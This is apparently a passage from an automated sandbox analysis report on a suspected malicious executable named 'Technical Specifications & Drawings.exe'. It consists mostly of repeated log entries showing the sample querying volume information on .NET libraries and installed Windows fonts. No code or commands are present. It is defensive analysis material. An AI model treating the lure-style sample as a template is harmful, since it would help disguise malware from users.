Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Users\user\Desktop\Technical Specifications & Drawings.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
